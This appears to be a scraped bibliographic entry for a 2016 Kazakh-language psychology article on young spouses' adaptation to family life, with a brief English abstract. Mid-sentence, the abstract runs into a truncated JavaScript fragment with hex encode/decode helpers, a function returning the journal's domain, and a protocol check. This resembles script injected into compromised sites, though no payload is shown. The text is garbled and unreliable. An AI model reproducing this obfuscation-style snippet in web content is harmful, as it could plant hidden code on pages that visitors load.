ЖАС ЖҰБАЙЛАРДЫҢ ОТБАСЫЛЫҚ ӨМІРГЕ БЕЙІМДЕЛУ МƏСЕЛЕСІ (The Journal of Psychology and Sociology, 2016)
The article discusses the psychological characteristics of adaptation, the causes of the crisis period and the ways to overcome the first difficulties.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "bulletin-psysoc.kaznu.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e